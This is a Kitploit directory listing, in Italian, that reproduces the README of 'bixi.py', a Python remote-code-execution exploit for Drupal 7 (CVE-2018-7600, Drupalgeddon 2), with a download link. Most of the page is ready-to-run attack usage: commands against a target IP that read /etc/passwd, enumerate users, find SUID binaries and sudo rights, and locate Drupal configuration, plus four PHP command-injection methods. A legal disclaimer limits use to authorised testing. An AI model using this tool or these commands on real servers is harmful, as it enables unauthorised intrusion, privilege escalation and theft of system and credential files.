Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Drupalgeddon2-CVE-2018-7600 — Exploit Python per CVE-2018-7600 (Drupalgeddon 2) che consente l'esecuzione remota di codice su Drupal 7 con più metodi di iniezione e comandi predefiniti per Linux e Windows. | Kitploit
Strumenti/GitHubGitHub/bixipro/drupalgeddon2-cve-2018-7600
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e Formazione
GitHubbixipro/drupalgeddon2-cve-2018-7600

Drupalgeddon2-CVE-2018-7600

Exploit Python per CVE-2018-7600 (Drupalgeddon 2) che consente l'esecuzione remota di codice su Drupal 7 con più metodi di iniezione e comandi predefiniti per Linux e Windows.

Vedi Repository
57 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔥 Drupalgeddon 2 Exploit — bixi.py

📖 Descrizione

bixi.py è un exploit per la vulnerabilità CVE‑2018‑7600 (Drupalgeddon 2) che colpisce Drupal 7. Permette l'esecuzione remota di comandi (RCE) su server Drupal vulnerabili tramite un'interfaccia intuitiva e comandi predefiniti.


⚠️ DISCLAIMER / AVVISO LEGALE

QUESTO SOFTWARE È SOLO A SCOPO EDUCATIVO E DI RICERCA IN AMBIENTI CONTROLLATI.

  • Utilizzare solo su sistemi di tua proprietà o per i quali hai autorizzazione scritta per test
  • L'uso non autorizzato è ILLEGALE e può comportare conseguenze penali
  • L'autore non si assume la responsabilità per l'uso improprio di questo strumento
  • Rispetta sempre le leggi locali e internazionali sulla cybersecurity

"With great power comes great responsibility"


📋 Caratteristiche

  • ✅ Sfruttamento automatico di CVE‑2018‑7600
  • ✅ Comandi predefiniti per Linux e Windows
  • ✅ Molteplici metodi di iniezione (system, passthru, exec, shell_exec)
  • ✅ Interfaccia intuitiva con sistema di aiuto
  • ✅ Gestione robusta di errori e timeout
  • ✅ Output formattato e facile da leggere

🚀 Installazione Rapida

1. Clonare il repository

git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
cd Drupalgeddon2-CVE-2018-7600

2. Installare le dipendenze

# Kali / Debian / Ubuntu
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install requests

# Altre distribuzioni
pip3 install requests

3. Dare permessi di esecuzione

chmod +x bixi.py

🎯 Utilizzo Base

Visualizzare l'aiuto completo

python3 bixi.py --help

Sintassi generale

python3 bixi.py <URL> <COMANDO/PAROLA_CHIAVE> [INJECTION_TYPE]

Esempi pratici

# Verificare vulnerabilità
python3 bixi.py http://10.99.99.6/drupal/ test

# Rilevare sistema operativo
python3 bixi.py http://10.99.99.6/drupal/ linux
python3 bixi.py http://10.99.99.6/drupal/ windows

# Elencare utenti
python3 bixi.py http://10.99.99.6/drupal/ users_linux
python3 bixi.py http://10.99.99.6/drupal/ net_user

# Informazioni di sistema
python3 bixi.py http://10.99.99.6/drupal/ ifconfig
python3 bixi.py http://10.99.99.6/drupal/ ipconfig

# Comandi personalizzati
python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"

📊 Parole Chiave Predefinite

🐧 Linux

ComandoDescrizione
linuxInformazioni di sistema
users_linuxElencare utenti
idInfo utente/gruppi
lsElencare file
ifconfigInfo rete
find_flagCercare flags

🪟 Windows

ComandoDescrizione
windowsInformazioni di sistema
net_userElencare utenti
whoami_winInfo dettagliata
ipconfigRete
netstat_winConnessioni
dirElencare directory

🔧 Pentesting

ComandoDescrizione
sudoVerificare privilegi sudo
suidCercare binari SUID
net_localgroupGruppi locali
drupal_configCercare configurazioni
drupal_versionOttenere versione Drupal

🎨 Metodi di Iniezione

# system (default)
python3 bixi.py http://target/ "whoami" system

# passthru
python3 bixi.py http://target/ "whoami" passthru

# exec
python3 bixi.py http://target/ "whoami" exec

# shell_exec
python3 bixi.py http://target/ "whoami" shell_exec

🏗️ Struttura del Progetto

drupalgeddon2-exploit/
│
├── bixi.py
├── README.md
├── requirements.txt
├── examples/
│   ├── linux_commands.txt
│   └── windows_commands.txt
└── screenshots/
    ├── help_screen.png
    └── exploit_success.png

🔧 Configurazione Avanzata

Proxy (opzionale)

proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

Timeout

Modificare valore predefinito (15 secondi):

timeout=15

Aggiungere nuovi comandi

Modificare il dizionario commands in get_command_for_keyword()


🐛 Risoluzione dei Problemi

Errore: No module named 'requests'

pip3 install requests

Errore: Connection refused

# Verificar conectividad
ping TARGET_IP

# Verificar ruta Drupal
curl http://TARGET_IP/drupal/
Scarica lo strumento